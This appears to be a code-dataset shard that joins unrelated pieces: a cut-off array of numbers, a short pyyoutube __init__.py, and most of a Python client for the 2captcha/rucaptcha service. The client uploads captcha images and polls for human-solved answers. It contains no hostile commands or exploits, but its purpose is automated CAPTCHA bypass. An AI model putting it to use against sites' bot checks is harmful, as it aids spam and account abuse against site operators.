0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.501, 0.126, -1.184, 0.05023, 0.0665, -0.1658, 0.917, -0.1392, -0.04062, 0.00957, 0.001741, 0.001966, 0.1396, -0.587, -0.1709, 0.4746, 0.2086, 0.3333, -0.4084, 0.0925, -1.51, -0.1942, 0.1354, -0.3792, 0.4028, 0.2164, 0.07855, 0.02278, -0.4297, -0.6885, -1.594, 0.153, 0.1641, 0.251, 0.5757, -3.78, -2.549, -0.1475, 0.3752, -0.326, -4.105, -0.224, -0.04684, -0.1924, -0.4707, 0.1156, 0.498, 0.2246, 0.5967, 0.0949], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.8115, 0.0782, 0.1405, -0.3604, 0.436, -0.2886, 0.4397, 0.5596, -0.681, 0.4336, -0.1378, 0.151, -0.0731, 0.3416, -0.0103, 0.526, -0.0704, 0.4429, -0.271, 0.243, 0.4805, 0.01889, 0.9766, -0.4812, 0.721, 0.2375, 0.0792, -0.00983, 0.6343, -0.36, -0.01487, -0.02597, -0.8403, -0.07935, 0.3499, -0.2798, 0.607, 0.0323, -0.44, -0.2917, 0.1338, 0.2023, -0.2133, 0.0957, 0.2585, -0.06018, -0.0883, 0.10315, -0.3596, -0.1542], [0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02264, -0.0404, -0.3733, -0.01613, -0.11993, 0.01668, -0.03345, -0.0714, -0.071, 0.0666, -0.1, -0.027, 0.0373, 0.09106, 0.03635, 0.02267, 0.0223, -0.4553, -0.0834, 0.0345, -0.1079, 0.071, 0.434, -0.05054, 0.1406, 0.0476, -0.1176, 0.02644, -0.00532, 0.03598, 0.00957, -0.1459, -0.1008, -0.409, -0.05566, -0.057, 0.05045, -0.2019, -0.00699, -0.03415, 0.03806, -0.008194, -0.1438, -0.04944, -0.05002, -0.0332, -0.01917, -0.04593, 0.010345, -0.03026], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00688, 0.08044, -0.337, -0.0332, 0.1492, 0.0948, 0.4407, 0.4993, 0.004562, 0.1656, -0.04123, 0.011795, 0.03937, -0.38, -0.1841, 0.02129, 0.011086, 0.00693, -0.4192, 0.2507, 0.1362, 0.0627, -1.212, -0.2003, -1.366, -0.07007, 0.04175, -0.07043, 0.04364, -0.4712, -0.01723, 0.0364, 0.03117, -0.02536, -0.08386, 0.126, 0.822, 0.016, 0.0718, 0.01029, -0.02562, 0.0231, -0.587, 0.004734, -1.482, -0.03522, -0.03165, -0.2368, 0.4634, -0.1294], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03235, -0.002546, 0.02834, -0.00856, -0.05878, 0.03186, -0.1891, -0.05652, -0.05356, -0.1329, -0.008995, -0.01862, 0.03812, -0.02151, 0.008286, -0.3699, 0.00663, -0.000765, 0.02092, 0.2247, -0.06323, -0.077, -0.03708, -0.01269, -0.8667, -0.0341, -0.04874, -0.03082, -0.0738, -0.0174, -0.005417, -0.0609, -0.02257, 0.00817, -0.1078, 0.003721, -0.0889, 0.07056, 
0.0585, -0.06088, 0.01205, -0.0003042, -0.1653, 0.00746, 0.02281, 0.004807, -0.02008, 0.0193, -0.2632, -0.1384], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.11176, -0.0781, -0.2146, -0.02098, 0.363, 0.1436, -0.03268, 0.013306, 0.0909, -0.2517, -0.08997, -0.03105, -0.08984, 0.0972, -0.1459, -0.1043, -0.003141, -0.07666, -0.04254, 0.0964, 0.09576, 0.00506, 0.010895, 0.08716, 1.22, -0.10284, 0.03827, -0.03745, -0.04343, -0.006454, -0.008, 0.02586, 0.1343, 0.172, 0.012054, 0.06137, -0.1515, -0.0005636, -0.1334, -0.1482, -0.1332, 0.00525, -0.0646, -0.03577, -0.0437, -0.02693, 0.005283, 0.078, 0.1835, -0.08844], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5605, -0.1179, 0.1719, -0.04175, -0.826, -0.3105, -0.1832, 0.3281, -0.6953, 0.1898, -0.01127, -0.1537, -1.057, 0.3357, 0.4463, -0.6475, -0.02995, 0.7495, -0.147, 0.3076, 0.2235, -0.0857, -0.3872, -0.356, -0.4832, -0.1431, 0.5117, 0.1857, 0.3281, -0.406, -0.09406, 0.013245, -0.4048, -0.1646, -0.0322, -0.05252, 0.2886, 0.2073, -0.3457, 0.0863, -0.1067, 0.3943, -0.326, -0.2479, 0.03952, -0.203, -0.387, -0.1184, -0.4507, 0.0928], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0441, -0.04245, -0.00868, -0.03976, 0.1176, 0.04648, -0.193, 0.0964, 0.00378, -0.122, 0.00778, -0.03534, 0.1122, -0.0689, 0.08594, -0.145, -0.00852, 0.1097, 0.005783, -0.0317, -0.11316, 0.0668, 0.274, -8.47, 3.498, 0.04068, 0.33, 
-0.06256, 0.01054, -0.10254, -0.02051, -0.1575, -0.04453, 0.4973, -0.1703, -0.04727, -0.015175, -0.0994, 0.0411, -0.055, 0.01351, -0.1948, 0.0766, 0.00794, 0.02377, 0.005795, 0.003504, -0.2583, -0.3513, 0.142], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003063, -0.00597, 0.00479, -0.02278, 0.01284, 0.00806, 0.04526, -0.02252, -0.002087, -0.0881, 0.002043, -0.01418, -0.0459, 0.02554, 0.00681, 0.0392, 0.003325, 0.011284, -0.006107, 0.148, -0.10876, -0.01207, 0.112, 0.03824, -0.5728, 0.00605, 0.01036, 0.0002704, -0.03775, 0.2795, -0.015274, -0.084, -0.01775, 0.02557, -0.0602, -0.00746, 0.03366, -0.01996, 0.125, -0.0654, 0.005543, -0.02026, -0.009315, 0.02875, 0.02165, -0.01712, -0.003292, -0.00998, 0.0968, 0.02003], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1123, 0.01639, -0.0391, 0.01642, 0.02646, -1.624, 0.07855, -0.0401, -0.03482, -4.977, 0.005463, -0.0536, 0.2336, -0.01142, 0.0807, 0.1039, 0.01802, 0.0448, -0.0781, 0.01119, -0.1565, -0.01825, 0.2443, -0.2262, -0.1433, -0.05417, -0.305, -0.0167, 0.01964, -0.3289, -0.0773, 0.0744, 0.04916, 0.1393, 0.05087, 0.01785, 0.1255, 0.08856, -0.07324, 0.0369, -0.1032, 0.03644, -0.03177, -0.302, -0.1007, -0.06207, -0.05444, -0.03732, -0.2754, 0.03099], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4465, 0.38, -1.018, -0.09595, -0.5317, 1.819, 1.727, -0.3225, -3.002, -1.588, -1.07, 0.2441, -0.5566, -0.9473, 
0.1237, 2.35, -0.681, 2.287, 0.421, -0.3005, 0.09894, -0.6934, 2.828, -7.105, -1.952, 0.1356, -1.655, -0.05124, -0.1335, 1.072, 0.5386, 1.471, -0.435, 0.7476, 0.7407, -0.781, 0.563, 0.2399, 1.496, -0.515, -1.268, -1.347, 0.706, 0.1803, 0.0745, 0.2922, -0.09485, -2.402, 1.9, 0.2405], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00875, -0.01281, 0.010605, -0.01314, 0.0611, -0.03702, -0.392, -0.1335, 0.00801, -0.0552, -0.006386, -0.01436, 0.10236, 0.00581, -0.02898, 0.1489, 1.4e-06, -0.02628, 0.01633, 0.1481, -0.02267, -0.005222, 0.02605, -0.236, 0.1602, 0.0211, 0.527, -0.10443, -0.03143, -0.0603, -0.0081, 0.05182, -0.002096, -0.1395, -0.0467, -0.05893, 0.08124, -0.0771, -0.10254, -0.0518, 0.01665, 0.04086, -0.02795, -0.0871, -0.004433, -0.02858, -0.007275, 0.04236, 0.1589, 0.02573], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0362, -0.005775, -0.01037, -0.02475, -0.2219, -0.2983, -0.00372, 0.10016, -0.05685, -0.0673, -0.002478, 0.03568, 0.09344, 0.02524, -0.0761, 0.3945, 0.00696, -0.03436, 0.02844, 0.1981, 0.05743, -0.02495, 0.2327, -0.06256, -0.4917, -0.08325, 0.1276, 0.03867, -0.05295, -0.0361, -0.03848, -0.0432, 0.0503, 0.03818, -0.09546, -0.00847, 0.2406, 0.05338, 0.01703, -0.1675, 0.01292, -0.0881, 0.01775, 0.1492, 0.0674, -0.05618, -0.03918, 0.0233, -0.2277, -0.1191], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.335, -0.11395, -0.279, -0.3872, 
0.4045, -1.1875, 0.06085, -0.0178, -0.06213, 0.6, 0.106, 0.01607, 0.04077, 0.3047, -0.0433, -0.2922, -0.2546, 0.1604, -0.2118, 0.4546, 0.10565, 0.1416, -0.3289, -0.4736, 0.03125, 0.05493, 0.05673, -0.141, -0.0629, 0.3142, -0.0987, 0.0319, -0.1001, 0.1481, 0.2156, 0.1838, -1.526, 0.0807, -0.1606, -0.3992, -1.895, 0.291, -0.1652, -0.197, -0.4978, -0.4246, -0.03458, 0.1096, 0.6367, -0.1328], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0985, -0.0703, -0.2332, -0.0523, 0.6704, 0.11426, -0.513, 0.1265, 0.08374, 0.1606, -0.03842, -0.04773, 0.243, 0.0954, -0.517, 0.346, 0.0963, -0.3015, -0.7026, 0.1387, -0.1561, 0.06726, 0.855, -0.1604, 0.6006, -0.3303, -0.233, -0.2546, -0.1688, 0.878, 0.03207, -0.0213, 0.388, -0.0368, -0.1353, 0.1815, -1.053, -0.2095, -0.3674, -0.3455, -0.155, -0.1875, 0.0272, 0.1382, 0.1912, -0.01258, -0.001796, 0.2345, 0.2578, -0.05542], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0941, -0.0732, -0.0711, -0.004776, -0.07697, -0.1273, 0.2212, 0.1425, -0.02939, -0.3325, -0.02487, -0.07153, -0.1375, -0.0014105, -0.1119, -0.1743, 0.02145, -0.08405, 0.04108, 0.08777, -0.02261, -0.0965, -0.02567, 0.1298, -0.1708, -0.10333, 0.06506, -0.04813, -0.01268, 0.152, -0.0673, 0.1611, -0.0537, 0.03256, 0.01698, -0.04453, 0.10803, 0.0273, -0.1393, -0.0807, 0.0871, 0.05078, -0.00986, -0.0718, 0.08203, 0.02365, -0.03004, 0.148, 0.11554, -0.2339], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
79f28f752576f87441a4320d8952fb38979504de | 132 | py | Python | pyyoutube/__init__.py | JoshPaulie/python-youtube | d47da87d03636e4e7166045b4ad9d6426ba43a14 | ["MIT"] | 156 | 2019-09-01T13:57:49.000Z | 2022-03-31T13:51:21.000Z | pyyoutube/__init__.py | JoshPaulie/python-youtube | d47da87d03636e4e7166045b4ad9d6426ba43a14 | ["MIT"] | 88 | 2019-10-20T16:08:50.000Z | 2022-02-08T10:50:54.000Z | pyyoutube/__init__.py | JoshPaulie/python-youtube | d47da87d03636e4e7166045b4ad9d6426ba43a14 | ["MIT"] | 33 | 2019-10-15T17:46:38.000Z | 2022-01-30T04:50:49.000Z |
from .api import Api # noqa
from .error import * # noqa
from .models import * # noqa
from .utils.constants import TOPICS # noqa
036879877fbc183896702bbae644621fe91ed72e | 23,169 | py | Python | python_rucaptcha/ImageCaptcha.py | MasterScott/python-rucaptcha | 187e06511384dbbd52d16d68056c7b7b0c5ab5a3 | ["MIT"] | 70 | 2017-08-04T14:20:19.000Z | 2022-02-26T21:13:09.000Z | python_rucaptcha/ImageCaptcha.py | MasterScott/python-rucaptcha | 187e06511384dbbd52d16d68056c7b7b0c5ab5a3 | ["MIT"] | 56 | 2017-08-05T22:51:01.000Z | 2022-03-25T10:47:57.000Z | python_rucaptcha/ImageCaptcha.py | MasterScott/python-rucaptcha | 187e06511384dbbd52d16d68056c7b7b0c5ab5a3 | ["MIT"] | 28 | 2017-08-08T11:21:12.000Z | 2022-03-27T12:39:19.000Z |
import os
import time
import uuid
import base64
import shutil
import asyncio
import aiohttp
import requests
from requests.adapters import HTTPAdapter
from python_rucaptcha.config import app_key
from python_rucaptcha.decorators import api_key_check, service_check
from python_rucaptcha.result_handler import get_sync_result, get_async_result
class ImageCaptcha:
"""
    This class handles uploading and solving both regular and large
    image captchas.
    Pass the service API key, a link to the image and, optionally, the
    time to wait for the captcha solution.
    See the 'captcha_handler' method for details.
"""
def __init__(
self,
rucaptcha_key: str,
sleep_time: int = 5,
save_format: str = "temp",
service_type: str = "2captcha",
img_clearing: bool = True,
img_path: str = "PythonRuCaptchaImages",
**kwargs,
):
"""
        Initialize the required variables and create the folder for images
        and cache. Temporary files and folders are removed when work is done.
        :param rucaptcha_key: API key from the user's account
        :param sleep_time: Time to wait for the captcha solution
        :param save_format: Format in which the image is stored: either as a
            temporary file - 'temp', or as a regular image in a folder
            created by the library - 'const'.
        :param service_type: Service URL the program works with; possible
            values are "2captcha" (default) and "rucaptcha"
        :param img_path: Folder for saving captcha images;
        :param img_clearing: True - delete the file after solving,
            False - keep the file after solving;
        :param kwargs: Optional parameters merged into the request payload
            sent to RuCaptcha
        Detailed examples are available in 'CaptchaTester/image_captcha_example.py'
"""
        # time to wait for the captcha solution
        self.sleep_time = sleep_time
        # service URL type the library works with
        self.service_type = service_type
        # validate the requested way of saving the captcha image
        if save_format in ["const", "temp"]:
            self.save_format = save_format
            # if files are saved to a folder, take the folder name and the
            # clear/keep flag for solved captchas
            if self.save_format == "const":
                # clear the folder after solving - True, keep all files - False
                self.img_clearing = img_clearing
                # folder name for saving captcha files
                self.img_path = img_path
                # create the folder for saving captchas
                os.makedirs(self.img_path, exist_ok=True)
        else:
            raise ValueError(
                "\nПередан неверный формат сохранения файла изображения. "
                f"\n\tВозможные варинты: `temp` и `const`. Вы передали - `{save_format}`"
                "\nWrong `save_format` parameter. Valid params: `const` or `temp`."
                f"\n\tYour param - `{save_format}`"
            )
        # payload of the POST request that uploads the captcha to the server
        self.post_payload = {
            "key": rucaptcha_key,
            "method": "base64",
            "json": 1,
            "soft_id": app_key,
        }
        # merge any extra parameters into post_payload
        if kwargs:
            for key in kwargs:
                self.post_payload.update({key: kwargs[key]})
        # payload of the GET request that fetches the captcha solution
        self.get_payload = {"key": rucaptcha_key, "action": "get", "json": 1}
        # create the session
        self.session = requests.Session()
        # number of connection retries to the server on error
        self.session.mount("http://", HTTPAdapter(max_retries=5))
        self.session.mount("https://", HTTPAdapter(max_retries=5))
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type:
return False
return True
def __image_temp_saver(self, content: bytes):
"""
        Save the image as a temporary file and send it straight to the
        server for solving.
        :return: Captcha ID from the service
"""
captcha_id = None
try:
            # Send the captcha image and other parameters to RuCaptcha;
            # the JSON response contains the ID of the captcha being solved
self.post_payload.update({"body": base64.b64encode(content).decode("utf-8")})
captcha_id = self.session.post(self.url_request, data=self.post_payload).json()
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
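The `method: base64` upload expects the image bytes as UTF-8 base64 text in the `body` field. A minimal stdlib sketch of just that encoding step (the helper name is invented for illustration; no network call is made, the dict simply mirrors `post_payload`):

```python
import base64

def encode_image_payload(content: bytes, payload: dict) -> dict:
    """Return a copy of the POST payload with the image base64-encoded
    into the `body` field, as done before the upload request."""
    payload = dict(payload)  # leave the caller's payload untouched
    payload["body"] = base64.b64encode(content).decode("utf-8")
    return payload

raw = b"\x89PNG\r\n\x1a\nfake-image-bytes"
payload = encode_image_payload(raw, {"method": "base64", "json": 1})
# the service decodes `body` back to the original image bytes
assert base64.b64decode(payload["body"]) == raw
```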
def __image_const_saver(self, content: bytes):
"""
        Create a folder, save the image into it, send the image for
        solving and delete the file afterwards.
        :param content: File to save;
        :return: Captcha ID from the service
"""
captcha_id = None
try:
            # unique image name
            image_name = uuid.uuid4()
            # save the image into the folder
            with open(os.path.join(self.img_path, f"im-{image_name}.png"), "wb") as out_image:
                out_image.write(content)
            with open(os.path.join(self.img_path, f"im-{image_name}.png"), "rb") as captcha_image:
                # Send the captcha image and other parameters to RuCaptcha;
                # the JSON response contains the ID of the captcha being solved
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
captcha_id = self.session.post(self.url_request, data=self.post_payload).json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
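The 'const' path writes the image to disk under a collision-free uuid name, then re-reads it for encoding. A sketch of that save-then-read pattern using a temporary directory instead of the library's folder (the helper name is hypothetical):

```python
import os
import uuid
import tempfile

def save_and_read(content: bytes, folder: str) -> bytes:
    """Write captcha bytes under a unique uuid-based name, then read
    them back, mirroring the two `open` calls in __image_const_saver."""
    path = os.path.join(folder, f"im-{uuid.uuid4()}.png")
    with open(path, "wb") as out_image:
        out_image.write(content)
    with open(path, "rb") as captcha_image:
        return captcha_image.read()

with tempfile.TemporaryDirectory() as tmp:
    data = save_and_read(b"fake-png-bytes", tmp)
assert data == b"fake-png-bytes"
```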
def __local_image_captcha(self, content: str, content_type: str = "file"):
"""
        Take a local file path (or a base64-encoded file) as a parameter,
        read the image and send it to RuCaptcha for checking to obtain its ID
        :param content: Path to the local file
        :param content_type: Type of the passed file; may be `file` (local
            path) or `base64` (base64-encoded image)
        :return: Captcha ID in the service
"""
captcha_id = None
try:
            # try to open the file, encode it to base64, then put the encoded
            # file into post_payload for sending to RuCaptcha for solving
if content_type == "file":
with open(content, "rb") as captcha_image:
self.post_payload.update(
{"body": base64.b64encode(captcha_image.read()).decode("utf-8")}
)
            # put the already-encoded file into post_payload for sending to RuCaptcha
elif content_type == "base64":
self.post_payload.update({"body": content})
else:
raise ValueError(
f"Передан неверный тип контента! Допустимые: `file` и `base64`. "
f"Вы передали: `{content_type}`"
)
            # Send the captcha image and other parameters to RuCaptcha;
            # the JSON response contains the ID of the captcha being solved
captcha_id = self.session.post(self.url_request, data=self.post_payload).json()
except (IOError, FileNotFoundError) as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
finally:
return captcha_id
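`__local_image_captcha` dispatches on `content_type`: a local path is read and encoded, a base64 string is passed through unchanged, and anything else raises `ValueError`. A reduced stand-alone version of that dispatch (the function name is invented for illustration):

```python
import base64

def build_body(content: str, content_type: str = "file") -> str:
    """Return the base64 `body` value for the upload payload."""
    if content_type == "file":
        # local path: read the file and encode it
        with open(content, "rb") as captcha_image:
            return base64.b64encode(captcha_image.read()).decode("utf-8")
    if content_type == "base64":
        # already encoded: pass through unchanged
        return content
    raise ValueError(
        f"Wrong content type `{content_type}`; valid values: `file`, `base64`."
    )

assert build_body("YWJj", content_type="base64") == "YWJj"
try:
    build_body("x", content_type="url")
    raised = False
except ValueError:
    raised = True
assert raised
```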
@api_key_check
@service_check
def captcha_handler(
self,
captcha_link: str = None,
captcha_file: str = None,
captcha_base64: str = None,
**kwargs,
):
"""
        Take an image link, send the image to the RuCaptcha server, wait
        for the captcha to be solved and return the result
        :param captcha_link: Link to the image
        :param captcha_file: Local path of the image to send for solving
        :param captcha_base64: Image passed as a base64-encoded string
        :param kwargs: Parameters for the `requests` library
        :return: Captcha answer as a JSON string with the fields:
                    captchaSolve - the captcha solution,
                    taskId - ID of the captcha-solving task,
                    error - False if all is well, True on error,
                    errorBody - name of the error
        """
        # result, url_request, url_response are set in the `service_check`
        # decorator after validating the passed service name
        # a local file path was passed
if captcha_file:
captcha_id = self.__local_image_captcha(captcha_file)
        # a base64-encoded file was passed
elif captcha_base64:
captcha_id = self.__local_image_captcha(captcha_base64, content_type="base64")
        # a URL was passed
elif captcha_link:
try:
content = self.session.get(url=captcha_link, **kwargs).content
except Exception as error:
self.result.update({"error": True, "errorBody": {"text": error, "id": -1}})
return self.result
            # pick the image-saving function according to the passed parameter
if self.save_format == "const":
captcha_id = self.__image_const_saver(content)
elif self.save_format == "temp":
captcha_id = self.__image_temp_saver(content)
else:
        # none of the parameters was passed
self.result.update(
{"error": True, "errorBody": "You did not send any file local link or URL."}
)
return self.result
        # check for errors while downloading/uploading the file
        if self.result["error"]:
            return self.result
        # if the response carries an error, record it and return the result
        elif captcha_id["status"] == 0:
            self.result.update({"error": True, "errorBody": captcha_id["request"]})
            return self.result
        # otherwise take the key of the submitted captcha and wait for the solution
        else:
            captcha_id = captcha_id["request"]
            # store the key of the submitted captcha in taskId
            self.result.update({"taskId": captcha_id})
            # update the payload with the key of the submitted captcha
            self.get_payload.update({"id": captcha_id})
            # if a `pingback` parameter was passed, do not wait for the
            # solution; return the unfilled response instead
            if self.post_payload.get("pingback"):
                return self.get_payload
            else:
                # wait for the captcha solution
time.sleep(self.sleep_time)
return get_sync_result(
get_payload=self.get_payload,
sleep_time=self.sleep_time,
url_response=self.url_response,
result=self.result,
)
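After the upload POST, the handler follows one fixed decision path: a zero `status` means the service rejected the captcha; otherwise the returned `request` value is the task key, which is either handed back immediately (pingback mode) or polled for after a sleep. A simplified, network-free sketch of that branching (the function name is hypothetical; the field names follow the JSON shapes used above):

```python
def handle_submit(response: dict, get_payload: dict, pingback: bool) -> dict:
    """Condensed control flow of `captcha_handler` after the upload."""
    if response["status"] == 0:
        # the service rejected the captcha: report the error text
        return {"error": True, "errorBody": response["request"]}
    captcha_id = response["request"]
    if pingback:
        # with a pingback URL the service calls back later;
        # return the polling payload without waiting
        return {**get_payload, "id": captcha_id}
    # normal mode: the caller would now sleep and poll for the result
    return {"error": False, "taskId": captcha_id}

ok = handle_submit({"status": 1, "request": "123"}, {"action": "get"}, False)
pb = handle_submit({"status": 1, "request": "123"}, {"action": "get"}, True)
bad = handle_submit({"status": 0, "request": "ERROR_ZERO_BALANCE"}, {}, False)
```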
def __del__(self):
if self.save_format == "const":
if self.img_clearing:
shutil.rmtree(self.img_path)
class aioImageCaptcha:
"""
    This asynchronous class handles uploading and solving both regular
    and large image captchas.
    Pass the service API key, a link to the image and, optionally, the
    time to wait for the captcha solution.
    See the 'captcha_handler' method for details.
"""
def __init__(
self,
rucaptcha_key: str,
sleep_time: int = 5,
save_format: str = "temp",
service_type: str = "2captcha",
img_clearing: bool = True,
img_path: str = "PythonRuCaptchaImages",
**kwargs,
):
"""
        Initialize the required variables and create the folder for images
        and cache. Temporary files and folders are removed when work is done.
        :param rucaptcha_key: API key from the user's account
        :param sleep_time: Time to wait for the captcha solution
        :param save_format: Format in which the image is stored:
            either as a temporary file - 'temp',
            or as a regular image in a folder created by the library - 'const'.
        :param service_type: Service URL the program works with;
            possible values are "2captcha" (default) and "rucaptcha"
        :param img_path: Folder for saving captcha images;
